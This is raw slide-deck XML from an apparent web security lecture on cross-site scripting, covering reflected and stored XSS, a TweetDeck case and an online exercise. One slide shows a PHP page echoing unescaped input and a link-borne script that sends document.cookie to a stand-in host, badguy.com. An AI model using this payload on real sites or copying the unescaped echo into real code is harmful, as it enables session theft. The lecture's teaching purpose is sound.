          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162797" y="1429922"/>
            <a:ext cx="1524000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="148" name="Shape 148"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304825" y="2908775"/>
            <a:ext cx="4515600" cy="9300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="149" name="Shape 149"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2304825" y="4508975"/>
            <a:ext cx="4515600" cy="9300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419625" y="2529682"/>
            <a:ext cx="2286000" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Send Request to Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3325575" y="4143003"/>
            <a:ext cx="2474100" cy="254100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Send Response to Client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2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Shape 650"/>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Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Shape 651"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploits the trust your browser has in a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Usually requires victim clicking or visiting a link to a trusted website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Results in attacker running arbitrary Javascript in victim browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Shape 652"/>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Shape 658"/>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The Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Shape 659"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User input is echoed into HTML response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:    search field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://search.com/search.php ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php  responds with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;	&lt;TITLE&gt; Search Results &lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Results for &lt;?php echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 660"/>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Shape 666"/>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The Malicious Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Shape 667"/>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431800" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider link: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(properly URL encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http://search.com/search.php ? term =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;script&gt; window.open(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  “http://badguy.com?cookie = ” +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  document.cookie )  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if user clicks on this link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Shape 668"/>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Shape 674"/>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So What?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Shape 675"/>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381000" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why would user click on such a link?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing email in webmail client  (e.g. gmail).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Link in doubleclick banner ad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if badguy.com gets cookie for victim.com ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie can include session auth or other sensitive data only intended for victim.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Shape 676"/>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Shape 68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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Shape 683"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="684" name="Shape 684"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="219838" y="1514600"/>
            <a:ext cx="8704326" cy="43111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Shape 690"/>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Stored Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Shape 69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692" name="Shape 692"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="107575" y="1341450"/>
            <a:ext cx="8904565" cy="50503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7" name="Shape 697"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Shape 698"/>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Example - TweetDeck</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Shape 699"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Shape 700"/>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701" name="Shape 701"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="739237" y="1600200"/>
            <a:ext cx="7665526" cy="4728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Shape 707"/>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XSS Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Shape 708"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2558825"/>
            <a:ext cx="8229600" cy="3567600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://xss-game.appspot.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Try to use as few hints as possible!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709" name="Shape 709"/>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Shape 715"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>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lang="en-US"/>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716" name="Shape 716"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417650"/>
            <a:ext cx="8229600" cy="49002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Char char="•"/>
            </a:pPr>
            <a:r>
